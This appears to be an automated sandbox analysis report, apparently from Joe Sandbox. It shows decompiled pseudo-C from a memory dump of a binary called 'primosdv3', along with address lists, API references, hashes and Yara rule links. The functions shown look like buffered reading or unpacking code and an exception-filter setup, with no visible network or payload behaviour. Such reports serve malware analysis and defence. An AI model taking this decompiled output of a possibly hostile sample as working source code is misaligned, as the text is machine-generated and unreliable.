																		_t142 = _t721 - 0x30b8; // -10424
																		_push(_t582 + 0x32);
																		if(__eflags != 0) {
																			_push(6);
																			E00C62021(__eflags);
																			E00C66D83(0xca1098, 0xb);
																			 *(_t721 - 0xe) = 0;
																			goto L78;
																		}
																		_push(0x83);
																		E00C62021(__eflags);
																		E00C6F279( *(_t697 + 8) + 0x6024);
																		 *(_t721 - 4) =  *(_t721 - 4) | 0xffffffff;
																		_t147 = _t721 - 0x1174; // -2420
																		L00C6F204(_t147);
																	}
																}
																E00C66D83(0xca1098, 2);
																_t554 = E00C61F47(_t582);
																__eflags =  *(_t582 + 0x6ccc);
																_t406 = _t554 & 0xffffff00 |  *(_t582 + 0x6ccc) == 0x00000000;
																goto L15;
															}
															_t106 = _t721 - 0x10a8; // -2216
															_t556 = E00C67BE7(_t106, _t582 + 0x32d8);
															__eflags = _t556;
															if(_t556 == 0) {
																goto L65;
															}
															__eflags =  *((char*)(_t721 - 0x10ac));
															if( *((char*)(_t721 - 0x10ac)) == 0) {
																L63:
																 *(_t721 - 0xe) = 0;
																goto L65;
															}
															_t108 = _t721 - 0x10a8; // -2216
															_t558 = E00C67BCA(_t108, _t697);
															__eflags = _t558;
															if(_t558 == 0) {
																goto L65;
															}
															goto L63;
														}
														__eflags = _t707 - _t686;
														if(_t707 != _t686) {
															goto L65;
														}
														goto L59;
													}
													__eflags =  *((char*)(_t411 + 0x715c));
													if( *((char*)(_t411 + 0x715c)) == 0) {
														goto L65;
													}
													goto L57;
												}
												__eflags =  *(_t697 + 0x1100);
												if( *(_t697 + 0x1100) == 0) {
													goto L54;
												}
												 *(_t721 - 0xe) = 1;
												__eflags =  *(_t582 + 0x3330);
												if( *(_t582 + 0x3330) == 0) {
													goto L55;
												}
												goto L54;
											}
											__eflags = _t707 - _t400;
											_t401 = 1;
											if(_t707 != _t400) {
												goto L50;
											}
											goto L49;
										}
										L45:
										_t689 =  *(_t582 + 0x6ccc);
										 *(_t721 - 0xd) = _t689;
										 *(_t721 - 0x28) = _t689;
										__eflags = _t689;
										if(_t689 == 0) {
											goto L220;
										}
										_t685 = 0;
										__eflags = 0;
										goto L47;
									}
									_t398 =  *(_t697 + 8);
									__eflags =  *(_t398 + 0x6127);
									if( *(_t398 + 0x6127) == 0) {
										goto L44;
									}
									__eflags =  *(_t582 + 0x6ccc);
									if( *(_t582 + 0x6ccc) != 0) {
										goto L14;
									}
									 *(_t721 - 0x11) = 0;
									goto L45;
								}
								__eflags =  *(_t697 + 0xf4) -  *((intOrPtr*)(_t586 + 0xb334));
								if( *(_t697 + 0xf4) <  *((intOrPtr*)(_t586 + 0xb334))) {
									goto L29;
								}
								__eflags =  *((char*)(_t697 + 0xf9));
								if( *((char*)(_t697 + 0xf9)) != 0) {
									goto L14;
								}
								goto L29;
							}
							if(__eflags < 0) {
								L25:
								 *(_t582 + 0x32f8) = _t684;
								 *(_t582 + 0x32fc) = _t684;
								goto L26;
							}
							__eflags =  *(_t582 + 0x32f8) - _t684;
							if( *(_t582 + 0x32f8) >= _t684) {
								goto L26;
							}
							goto L25;
						}
						if(__eflags < 0) {
							L21:
							 *(_t582 + 0x32f0) = _t684;
							 *(_t582 + 0x32f4) = _t684;
							goto L22;
						}
						__eflags =  *(_t582 + 0x32f0) - _t684;
						if( *(_t582 + 0x32f0) >= _t684) {
							goto L22;
						}
						goto L21;
					}
					if(_t383 != 3) {
						__eflags = _t383 - 5;
						if(_t383 != 5) {
							goto L9;
						}
						__eflags =  *((char*)(_t582 + 0x45c4));
						if( *((char*)(_t582 + 0x45c4)) == 0) {
							goto L14;
						}
						_push(_t585);
						_push(_t684);
						_push(_t704);
						_push(_t582);
						_t573 = E00C78C8D();
						__eflags = _t573;
						if(_t573 != 0) {
							__eflags = 0;
							 *0xc93278( *((intOrPtr*)(_t582 + 0x6cb8)),  *((intOrPtr*)(_t582 + 0x6cbc)), 0);
							 *((intOrPtr*)( *((intOrPtr*)( *_t582 + 0x10))))();
							goto L17;
						}
						L13:
						E00C66D83(0xca1098, 1);
						goto L14;
					} else {
						if( *(_t697 + 0x10ff) != 0) {
							E00C67A0D(_t582, _t721,  *(_t697 + 8), _t582, _t697 + 0x1100);
						}
						goto L9;
					}
				}
				if( *((intOrPtr*)(__ecx + 0x67)) == 0) {
					goto L14;
				}
				_push(_t585);
				_push(0);
				_t704 = __ecx + 0x10;
				_push(_t704);
				_push(_t582);
				 *(_t721 - 0x20) = _t704;
				if(E00C78C8D() == 0) {
					goto L13;
				} else {
					_t585 =  *(_t721 - 0x18);
					_t684 = 0;
					goto L5;
				}
			}

0x00c68493
0x00c6849d
0x00c684a3
0x00c684a6
0x00c684aa
0x00c684ac
0x00c684b2
0x00c684b9
0x00c684bf
0x00c684e0
0x00c684e3
0x00c684e6
0x00c684e6
0x00c684ef
0x00c6857a
0x00c68580
0x00c68586
0x00c6859e
0x00c6859e
0x00c685a4
0x00c685bc
0x00c685bc
0x00c685bf
0x00c685c5
0x00c685e2
0x00c685e7
0x00c685eb
0x00c685f5
0x00c68600
0x00c68605
0x00c68607
0x00c6860b
0x00c6860d
0x00c6860f
0x00c68613
0x00c68615
0x00c68617
0x00c68617
0x00c68613
0x00c6861f
0x00c68624
0x00c68625
0x00c68632
0x00c68633
0x00c6863b
0x00c68642
0x00c68645
0x00c6869c
0x00c686a1
0x00c686a3
0x00c686a5
0x00c686ab
0x00c686b1
0x00c686b5
0x00c686b5
0x00c686b5
0x00c686b5
0x00c68647
0x00c6864a
0x00c68650
0x00c68652
0x00c68654
0x00c68658
0x00c6865a
0x00c68661
0x00c68666
0x00c68667
0x00c6866e
0x00c68673
0x00c6867d
0x00c6867f
0x00c68695
0x00c68681
0x00c68683
0x00c6868a
0x00c6868c
0x00c6868c
0x00c6867f
0x00c68658
0x00c68652
0x00c686be
0x00c686c3
0x00c686db
0x00c686e6
0x00c686ee
0x00c686f1
0x00c686f3
0x00c686f5
0x00c686f7
0x00c686fa
0x00c686fd
0x00c68703
0x00c68721
0x00c68721
0x00c68724
0x00c6873c
0x00c6873f
0x00c68744
0x00c6874a
0x00c6874b
0x00c6874d
0x00c68756
0x00c68756
0x00c68758
0x00c6875b
0x00c68765
0x00c6876c
0x00c68771
0x00c68773
0x00c68543
0x00c68543
0x00c68543
0x00c68545
0x00c6854b
0x00c68553
0x00c68553
0x00c68779
0x00c6877e
0x00c68786
0x00c68787
0x00c6878a
0x00c68791
0x00c68792
0x00c68799
0x00c6879c
0x00c687b3
0x00c687b3
0x00c687b6
0x00c687b6
0x00c687bb
0x00c687be
0x00c687c5
0x00c687c6
0x00c687c9
0x00c687cc
0x00c687d7
0x00c687d7
0x00c687da
0x00c687e1
0x00c687e1
0x00c687e7
0x00c687ee
0x00c687ef
0x00c687fd
0x00c68802
0x00c68804
0x00c6883c
0x00c6883f
0x00c6884b
0x00c6884b
0x00c6884b
0x00c6884e
0x00c6884e
0x00c68858
0x00c6885d
0x00c6885f
0x00c68883
0x00c68883
0x00c6888a
0x00000000
0x00000000
0x00c6888c
0x00c68896
0x00c6889b
0x00c6889d
0x00c6897f
0x00000000
0x00c6897f
0x00c688a3
0x00c688a6
0x00c688b4
0x00c688b5
0x00c688b5
0x00c688b7
0x00c688b9
0x00c688d5
0x00c688df
0x00c688e9
0x00c688fb
0x00c68900
0x00c68907
0x00c689a5
0x00c689a5
0x00c689a8
0x00c689a8
0x00c689ac
0x00c689b2
0x00c689b7
0x00c689bd
0x00c689c2
0x00c689ca
0x00c689cb
0x00c689ce
0x00c689d3
0x00c689d4
0x00c689d6
0x00c68a5f
0x00c68a61
0x00c68a66
0x00c68a68
0x00c68ab6
0x00c68ab9
0x00c68abb
0x00c68ad5
0x00c68ad7
0x00c68ad7
0x00c68ad8
0x00c68ad8
0x00c68adf
0x00c68b14
0x00c68b16
0x00c6910c
0x00c6910c
0x00c69110
0x00c69116
0x00c6911b
0x00c6911f
0x00c69122
0x00c69125
0x00c69127
0x00c69127
0x00c69127
0x00c69127
0x00c6912d
0x00c6912d
0x00c69131
0x00000000
0x00000000
0x00c69137
0x00c69139
0x00c68576
0x00c68576
0x00000000
0x00c68576
0x00c6913f
0x00c69145
0x00c68513
0x00c68515
0x00000000
0x00c68515
0x00c6914b
0x00c6914d
0x00000000
0x00c6914d
0x00c68b1c
0x00c68b1c
0x00c68b1f
0x00c68b1f
0x00c68b22
0x00c68b29
0x00c68b3b
0x00c68b3b
0x00c68b3e
0x00c68b40
0x00c68b87
0x00c68b87
0x00c68b8b
0x00c68b8d
0x00c68b95
0x00c68b95
0x00c68ba9
0x00c68baf
0x00c68bb5
0x00c68bbb
0x00c68bcc
0x00c68be2
0x00c68be7
0x00c68bed
0x00c68bf0
0x00c68bf6
0x00c68bf9
0x00c68bfc
0x00c68c03
0x00c68c06
0x00c68c0c
0x00c68c11
0x00c68c14
0x00c68c16
0x00c68c19
0x00c68c1c
0x00c68c1f
0x00c68c22
0x00c68c25
0x00c68c27
0x00c68cd6
0x00c68cd6
0x00c68cd9
0x00c68ce0
0x00c68ce7
0x00c68ceb
0x00c68d01
0x00c68d01
0x00c68d03
0x00c68d06
0x00c68d06
0x00c68d0a
0x00c68d0e
0x00c68d12
0x00c68e40
0x00c68e47
0x00c68e49
0x00c68e50
0x00c68e73
0x00c68e74
0x00c68e7a
0x00c68e7f
0x00c68e91
0x00c68e97
0x00c68e99
0x00c68e9f
0x00c68eb9
0x00c68e52
0x00c68e52
0x00c68e58
0x00c68e5e
0x00c68e5f
0x00c68e5f
0x00c68e50
0x00c68ebe
0x00c68ec0
0x00c68ec5
0x00c68ecc
0x00c68efe
0x00c68efe
0x00c68efe
0x00c68f00
0x00c68f02
0x00c68f02
0x00c68f09
0x00c68f13
0x00c68f1a
0x00c68f39
0x00c68f39
0x00c68f3d
0x00c68f40
0x00c68f98
0x00c68f98
0x00c68f9c
0x00c68f9f
0x00c68fb2
0x00c68fb2
0x00c68fb2
0x00c68fb4
0x00c68fb4
0x00c68fb8
0x00000000
0x00000000
0x00c68fbe
0x00c68fc1
0x00c68fc5
0x00c68fd1
0x00c68fd1
0x00c68fd5
0x00c68ff0
0x00c68ff0
0x00c68ff2
0x00c69007
0x00c69007
0x00c69009
0x00c690cd
0x00c690cd
0x00c690d0
0x00c690d7
0x00c690df
0x00c690e6
0x00c690eb
0x00c690ed
0x00c690f6
0x00c69100
0x00c69100
0x00c690ed
0x00c69105
0x00000000
0x00c69105
0x00c6900f
0x00c69014
0x00c69016
0x00c69019
0x00c6901f
0x00c6901f
0x00c69021
0x00c69033
0x00c69033
0x00c69039
0x00c6903e
0x00c69047
0x00c6905b
0x00c69062
0x00c69075
0x00c69077
0x00c69080
0x00c69085
0x00c6908b
0x00c6909a
0x00c690ad
0x00c690c0
0x00c690c2
0x00c690c5
0x00c690ca
0x00000000
0x00c690ca
0x00c69023
0x00c69029
0x00000000
0x00000000
0x00c6902b
0x00c69031
0x00000000
0x00000000
0x00000000
0x00c69031
0x00c6901b
0x00c6901d
0x00000000
0x00000000
0x00000000
0x00c6901d
0x00c68ff4
0x00c68ff7
0x00c68ffe
0x00000000
0x00000000
0x00c69004
0x00000000
0x00c69004
0x00c68fd7
0x00c68fd9
0x00000000
0x00000000
0x00c68fdb
0x00c68fe2
0x00000000
0x00000000
0x00c68fe8
0x00c68fea
0x00000000
0x00000000
0x00000000
0x00c68fea
0x00c68fc7
0x00c68fcb
0x00000000
0x00000000
0x00000000
0x00c68fcb
0x00c68fa1
0x00c68fa8
0x00000000
0x00000000
0x00c68faa
0x00c68fac
0x00000000
0x00000000
0x00c68fae
0x00000000
0x00c68fae
0x00c68f42
0x00c68f46
0x00000000
0x00000000
0x00c68f48
0x00c68f4a
0x00000000
0x00000000
0x00c68f4c
0x00c68f52
0x00c68f71
0x00c68f71
0x00c68f73
0x00c68f73
0x00c68f74
0x00c68f80
0x00c68f8c
0x00c68f90
0x00c68f95
0x00000000
0x00c68f95
0x00c68f54
0x00c68f5a
0x00c68f64
0x00c68f64
0x00c68f6b
0x00000000
0x00000000
0x00c68f6d
0x00000000
0x00c68f6d
0x00c68f5c
0x00c68f62
0x00000000
0x00000000
0x00000000
0x00c68f62
0x00c68f1c
0x00c68f22
0x00000000
0x00000000
0x00c68f24
0x00c68f2e
0x00c68f2e
0x00c68f30
0x00c68f32
0x00c68f32
0x00000000
0x00c68f30
0x00c68f26
0x00c68f2c
0x00000000
0x00000000
0x00000000
0x00c68f2c
0x00c68f0b
0x00000000
0x00c68f0b
0x00c68edd
0x00c68eef
0x00c68ef4
0x00c68ef6
0x00000000
0x00000000
0x00c68ef8
0x00c68efa
0x00000000
0x00c68efa
0x00c68d18
0x00c68d1e
0x00c68d21
0x00c68d8a
0x00c68d8a
0x00c68d8f
0x00c68d9c
0x00c68d9d
0x00c68da2
0x00c68da7
0x00c68dad
0x00c68db0
0x00c68db7
0x00c68db8
0x00c68dbd
0x00c68dc0
0x00c68dc2
0x00c68e19
0x00c68e19
0x00c68e1c
0x00c68e1c
0x00c68e23
0x00c68d57
0x00c68d57
0x00c68d59
0x00c68e36
0x00c68e36
0x00c68e36
0x00c68e38
0x00c68e38
0x00000000
0x00c68e38
0x00c68d5f
0x00c68d5f
0x00c68d61
0x00000000
0x00000000
0x00c68d67
0x00000000
0x00c68d67
0x00c68e29
0x00c68e2b
0x00000000
0x00000000
0x00c68d53
0x00c68d53
0x00000000
0x00c68d53
0x00c68dc4
0x00c68dcc
0x00000000
0x00000000
0x00c68dce
0x00c68dd4
0x00c68de0
0x00c68de1
0x00c68de4
0x00c68dfa
0x00c68dfb
0x00c68e02
0x00c68e07
0x00c68e09
0x00c68e0c
0x00c68e0c
0x00c68e0e
0x00c68d50
0x00c68d50
0x00000000
0x00c68d50
0x00c68e14
0x00000000
0x00c68e14
0x00c68de6
0x00c68de9
0x00c68dee
0x00c68dee
0x00c68df0
0x00000000
0x00c68df0
0x00c68d23
0x00c68d26
0x00000000
0x00000000
0x00c68d28
0x00c68d2b
0x00c68d6e
0x00c68d6e
0x00c68d70
0x00000000
0x00000000
0x00c68d7c
0x00c68d83
0x00000000
0x00c68d83
0x00c68d2d
0x00c68d30
0x00000000
0x00000000
0x00c68d32
0x00c68d35
0x00000000
0x00000000
0x00c68d44
0x00c68d49
0x00c68d4b
0x00c68d4d
0x00000000
0x00c68d4d
0x00c68ced
0x00c68cef
0x00000000
0x00000000
0x00c68cf3
0x00c68cf4
0x00c68cf8
0x00000000
0x00000000
0x00c68cfa
0x00c68cfc
0x00000000
0x00c68cfc
0x00c68c2d
0x00c68c33
0x00000000
0x00000000
0x00c68c39
0x00c68c41
0x00c68c47
0x00c68c49
0x00c68cd1
0x00c68cd1
0x00c68cd1
0x00c68cd3
0x00000000
0x00c68cd3
0x00c68c4f
0x00c68c59
0x00c68c59
0x00c68c69
0x00c68c6c
0x00c68c6e
0x00c68cce
0x00c68cce
0x00000000
0x00c68cce
0x00c68c70
0x00c68c76
0x00c68c76
0x00c68c7a
0x00000000
0x00000000
0x00c68c7e
0x00c68c80
0x00c68ca5
0x00c68cab
0x00c68cb7
0x00c68cc2
0x00c68ccb
0x00000000
0x00c68ccb
0x00c68c82
0x00c68c8c
0x00c68c8e
0x00c68c93
0x00c68c99
0x00000000
0x00000000
0x00c68c9b
0x00000000
0x00000000
0x00c68c9d
0x00c68ca3
0x00000000
0x00000000
0x00000000
0x00c68ca3
0x00c68c84
0x00c68c8a
0x00000000
0x00000000
0x00000000
0x00c68c8a
0x00c68c72
0x00c68c74
0x00000000
0x00000000
0x00000000
0x00c68c74
0x00c68c51
0x00c68c57
0x00000000
0x00000000
0x00000000
0x00c68c57
0x00c68b8f
0x00c68b8f
0x00c68b8f
0x00c68b8f
0x00000000
0x00c68b8f
0x00c68b46
0x00c68b49
0x00c68b4a
0x00c68b4d
0x00c68b4f
0x00c68b5a
0x00c68b5c
0x00c68b6b
0x00c68b7d
0x00c68b7d
0x00c68b5c
0x00000000
0x00c68b4d
0x00c68b2b
0x00c68b32
0x00c68b39
0x00c68b84
0x00000000
0x00c68b84
0x00000000
0x00c68b39
0x00c68ae2
0x00c68ae5
0x00c68aec
0x00c68af3
0x00c68af8
0x00c68afa
0x00000000
0x00000000
0x00c68afc
0x00c68afe
0x00c68b01
0x00c68b01
0x00c68b07
0x00c68b0c
0x00000000
0x00c68b0c
0x00c68abd
0x00c68ac6
0x00c68ac7
0x00c68acc
0x00c68ace
0x00c68ad1
0x00c68ad1
0x00c68ad3
0x00000000
0x00000000
0x00000000
0x00c68ad3
0x00c68a6a
0x00c68a6e
0x00c68a74
0x00c68a77
0x00c68a7b
0x00c68a83
0x00c68a84
0x00c68a87
0x00c68a8b
0x00c68a8c
0x00c68a8f
0x00c68a91
0x00c68a97
0x00c68a9d
0x00c68a9f
0x00c68aa5
0x00c68aac
0x00c68aaf
0x00c68aaf
0x00c68a9d
0x00c68a8f
0x00c68a87
0x00c68a7b
0x00000000
0x00c68a6e
0x00c689dc
0x00c689df
0x00000000
0x00000000
0x00c689e1
0x00c689e4
0x00c689e6
0x00000000
0x00000000
0x00c689ec
0x00c689ef
0x00c689f2
0x00000000
0x00000000
0x00c689f8
0x00c689fb
0x00c68a02
0x00000000
0x00000000
0x00c68a0a
0x00c68a11
0x00c68a14
0x00c68a19
0x00c68a1b
0x00c68a4c
0x00c68a4c
0x00c68a50
0x00000000
0x00000000
0x00c68a56
0x00c68a58
0x00c68a5a
0x00000000
0x00c68a5a
0x00c68a1d
0x00c68a21
0x00000000
0x00000000
0x00c68a23
0x00c68a2b
0x00c68a2c
0x00c68a2d
0x00c68a33
0x00c68a36
0x00c68a3d
0x00c68a42
0x00c68a43
0x00c68a44
0x00c68a47
0x00000000
0x00c68a47
0x00c6890d
0x00c68914
0x00000000
0x00000000
0x00c6891c
0x00c68927
0x00c6892c
0x00c6892f
0x00c68931
0x00000000
0x00000000
0x00c68933
0x00c6893a
0x00c6893d
0x00000000
0x00000000
0x00c6893f
0x00c68946
0x00c68950
0x00c68951
0x00c6898b
0x00c6898d
0x00c68999
0x00c689a0
0x00000000
0x00c689a0
0x00c68953
0x00c68958
0x00c68966
0x00c6896b
0x00c6896f
0x00c68975
0x00c68975
0x00c68883
0x00c68868
0x00c6886f
0x00c68874
0x00c6887b
0x00000000
0x00c6887b
0x00c6880d
0x00c68813
0x00c68818
0x00c6881a
0x00000000
0x00000000
0x00c6881c
0x00c68823
0x00c68835
0x00c68837
0x00000000
0x00c68837
0x00c68826
0x00c6882c
0x00c68831
0x00c68833
0x00000000
0x00000000
0x00000000
0x00c68833
0x00c687dc
0x00c687df
0x00000000
0x00000000
0x00000000
0x00c687df
0x00c687ce
0x00c687d5
0x00000000
0x00000000
0x00000000
0x00c687d5
0x00c6879e
0x00c687a5
0x00000000
0x00000000
0x00c687a7
0x00c687ab
0x00c687b1
0x00000000
0x00000000
0x00000000
0x00c687b1
0x00c6874f
0x00c68752
0x00c68754
0x00000000
0x00000000
0x00000000
0x00c68754
0x00c68726
0x00c68726
0x00c6872c
0x00c6872f
0x00c68732
0x00c68734
0x00000000
0x00000000
0x00c6873a
0x00c6873a
0x00000000
0x00c6873a
0x00c68705
0x00c68708
0x00c6870e
0x00000000
0x00000000
0x00c68710
0x00c68716
0x00000000
0x00000000
0x00c6871c
0x00000000
0x00c6871c
0x00c685cd
0x00c685d3
0x00000000
0x00000000
0x00c685d5
0x00c685dc
0x00000000
0x00000000
0x00000000
0x00c685dc
0x00c685a6
0x00c685b0
0x00c685b0
0x00c685b6
0x00000000
0x00c685b6
0x00c685a8
0x00c685ae
0x00000000
0x00000000
0x00000000
0x00c685ae
0x00c68588
0x00c68592
0x00c68592
0x00c68598
0x00000000
0x00c68598
0x00c6858a
0x00c68590
0x00000000
0x00000000
0x00000000
0x00c68590
0x00c684f8
0x00c6851c
0x00c6851f
0x00000000
0x00000000
0x00c68521
0x00c68528
0x00000000
0x00000000
0x00c6852a
0x00c6852b
0x00c6852c
0x00c6852d
0x00c6852e
0x00c68533
0x00c68535
0x00c68558
0x00c6856c
0x00c68574
0x00000000
0x00c68574
0x00c68537
0x00c6853e
0x00000000
0x00c684fa
0x00c68501
0x00c6850e
0x00c6850e
0x00000000
0x00c68501
0x00c684f8
0x00c684c4
0x00000000
0x00000000
0x00c684c6
0x00c684c7
0x00c684c8
0x00c684cb
0x00c684cc
0x00c684cd
0x00c684d7
0x00000000
0x00c684d9
0x00c684d9
0x00c684dc
0x00000000
0x00c684dc

APIs

__EH_prolog.LIBCMT ref: 00C68493

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 03aa3ec4243fca31951d366e0d82f5a941ba660f66aefd5df8ef0e04c97704fe
Instruction ID: 0ac7d98797c82b4c4db88908d3eb1681dd5ecf6a347ad7e4286cc616fe907aac
Opcode Fuzzy Hash: 03aa3ec4243fca31951d366e0d82f5a941ba660f66aefd5df8ef0e04c97704fe
Instruction Fuzzy Hash: 6A821A70904245AEDF35DF64C8D5BFABBB9AF05300F0842B9E9599B182CB315B8CDB61

Uniqueness

Uniqueness Score: -1.00%

Function 00C7F9D5 Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7F9D5() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00C7F9F0); // executed
				return _t1;
			}

0x00c7f9da
0x00c7f9e0

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_0001F9F0,00C7F3A5), ref: 00C7F9DA

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 1b233e5edde62c310e81bd49b64cf9cfb2cfd06959e415075fa9beac260178ce
Instruction ID: e3a645b8e1260b9208dee41286a75b1fd046cc77361ce5598377c2ba48c0425a
Opcode Fuzzy Hash: 1b233e5edde62c310e81bd49b64cf9cfb2cfd06959e415075fa9beac260178ce
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00C76CDC Relevance: .3, Instructions: 343
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E00C76CDC(signed int __ecx, void* __edx) {
				void* __ebp;
				intOrPtr _t166;
				intOrPtr _t170;
				signed int _t176;
				signed int _t179;
				intOrPtr _t182;
				signed int _t185;
				signed int _t186;
				void* _t189;
				void* _t196;
				signed int _t201;
				signed int _t202;
				intOrPtr* _t203;
				signed int _t206;
				void* _t217;
				intOrPtr _t220;
				signed int _t223;
				signed int _t226;
				signed int _t230;
				signed int _t232;
				intOrPtr _t235;
				intOrPtr* _t236;
				intOrPtr* _t242;
				intOrPtr* _t244;
				void* _t247;
				signed int _t249;
				signed int _t250;
				signed int _t252;
				intOrPtr _t257;
				signed int _t265;
				intOrPtr* _t269;
				intOrPtr _t272;
				signed int _t275;
				signed int _t276;
				signed int _t278;
				intOrPtr* _t280;
				intOrPtr* _t282;
				void* _t283;
				signed int _t284;
				intOrPtr* _t285;
				intOrPtr _t287;
				void* _t289;
				void* _t290;
				void* _t292;

				_t223 = __ecx; // executed
				E00C7359E(__ecx, __edx); // executed
				E00C74D0A(__ecx,  *((intOrPtr*)(_t290 + 0x244)));
				_t282 = _t223 + 0x18;
				_t249 = 0;
				 *((intOrPtr*)(_t290 + 0x14)) = _t282;
				if( *(_t223 + 0x1c) +  *(_t223 + 0x1c) == 0) {
					 *((intOrPtr*)(_t290 + 0x14)) = _t282;
				} else {
					_t247 = 0;
					do {
						_t220 =  *_t282;
						_t247 = _t247 + 0x4ae4;
						_t249 = _t249 + 1;
						 *((char*)(_t220 + _t247 - 0x13)) = 0;
						 *((char*)(_t220 + _t247 - 0x11)) = 0;
					} while (_t249 <  *(_t223 + 0x1c) +  *(_t223 + 0x1c));
				}
				_t226 = 5;
				memcpy( *_t282 + 0x18, _t223 + 0x8c, _t226 << 2);
				E00C80320( *_t282 + 0x30, _t223 + 0xa0, 0x4a9c);
				_t292 = _t290 + 0x18;
				 *(_t292 + 0x30) = 0;
				_t265 = 0;
				 *((char*)(_t292 + 0x1b)) = 0;
				 *((char*)(_t292 + 0x13)) = 0;
				while(1) {
					L6:
					_t272 = 0;
					 *((intOrPtr*)(_t292 + 0x1c)) = 0;
					while(1) {
						L7:
						_push(0x00400000 - _t265 & 0xfffffff0);
						_push( *((intOrPtr*)(_t223 + 0x20)) + _t265);
						_t166 = E00C6D114( *_t223);
						 *((intOrPtr*)(_t292 + 0x34)) = _t166;
						if(_t166 < 0) {
							break;
						}
						_t265 = _t265 + _t166;
						 *(_t292 + 0x2c) = _t265;
						if(_t265 != 0) {
							if(_t166 <= 0 || _t265 >= 0x400) {
								if(_t272 >= _t265) {
									goto L69;
								} else {
									while(1) {
										_t252 = 0;
										 *(_t292 + 0x28) =  *(_t292 + 0x28) & 0;
										 *(_t292 + 0x24) = 0;
										_t176 =  *(_t223 + 0x1c) +  *(_t223 + 0x1c);
										if(_t176 != 0) {
										}
										L13:
										_t235 = 0;
										 *((intOrPtr*)(_t292 + 0x20)) = 0;
										while(1) {
											_t280 =  *_t282 + _t235;
											 *(_t292 + 0x30) = _t252;
											_t29 = _t280 + 4; // 0x4
											_t236 = _t29;
											 *_t280 = _t223;
											if( *((char*)(_t280 + 0x4ad3)) == 0) {
												goto L16;
											}
											L15:
											 *(_t280 + 0x4acc) = _t265;
											L18:
											_t42 = _t280 + 0x18; // 0x18
											_t285 = _t42;
											 *((char*)(_t280 + 0x4ad3)) = 0;
											 *(_t280 + 0x4ae0) = _t252;
											 *((char*)(_t280 + 0x4ad2)) = _t176 & 0xffffff00 |  *((intOrPtr*)(_t292 + 0x34)) == 0x00000000;
											if( *((char*)(_t280 + 0x14)) != 0) {
												L23:
												if( *((char*)(_t292 + 0x1b)) != 0 ||  *_t285 > 0x20000) {
													 *((char*)(_t280 + 0x4ad1)) = 1;
													 *((char*)(_t292 + 0x1b)) = 1;
												} else {
													 *(_t292 + 0x28) =  *(_t292 + 0x28) + 1;
												}
												_t287 =  *((intOrPtr*)(_t292 + 0x1c)) +  *((intOrPtr*)(_t280 + 0x24)) +  *_t285;
												_t252 = _t252 + 1;
												 *((intOrPtr*)(_t292 + 0x1c)) = _t287;
												_t235 =  *((intOrPtr*)(_t292 + 0x20)) + 0x4ae4;
												 *(_t292 + 0x24) = _t252;
												 *((intOrPtr*)(_t292 + 0x20)) = _t235;
												_t217 = _t265 - _t287;
												if(_t217 < 0 ||  *((char*)(_t280 + 0x28)) == 0) {
													if(_t217 >= 0x400) {
														_t176 =  *(_t223 + 0x1c) +  *(_t223 + 0x1c);
														if(_t252 < _t176) {
															_t282 =  *((intOrPtr*)(_t292 + 0x14));
															_t280 =  *_t282 + _t235;
															 *(_t292 + 0x30) = _t252;
															_t29 = _t280 + 4; // 0x4
															_t236 = _t29;
															 *_t280 = _t223;
															if( *((char*)(_t280 + 0x4ad3)) == 0) {
																goto L16;
															}
														}
													}
												}
											} else {
												_push(_t285);
												_push(_t236);
												 *((char*)(_t280 + 0x14)) = 1;
												if(E00C73E0B(_t223) == 0 ||  *((char*)(_t280 + 0x29)) == 0 &&  *((char*)(_t223 + 0xe662)) == 0) {
													 *((char*)(_t292 + 0x13)) = 1;
												} else {
													_t252 =  *(_t292 + 0x24);
													 *((char*)(_t223 + 0xe662)) = 1;
													goto L23;
												}
											}
											break;
											L16:
											E00C6A85A(_t236,  *((intOrPtr*)(_t223 + 0x20)) +  *((intOrPtr*)(_t292 + 0x1c)));
											_t33 = _t280 + 4; // 0x4
											_t236 = _t33;
											 *((intOrPtr*)(_t236 + 4)) = 0;
											_t176 = _t265 -  *((intOrPtr*)(_t292 + 0x1c));
											__eflags = _t176;
											 *_t236 = 0;
											 *(_t280 + 0x4acc) = _t176;
											if(_t176 != 0) {
												 *((char*)(_t280 + 0x4ad0)) = 0;
												 *((char*)(_t280 + 0x14)) = 0;
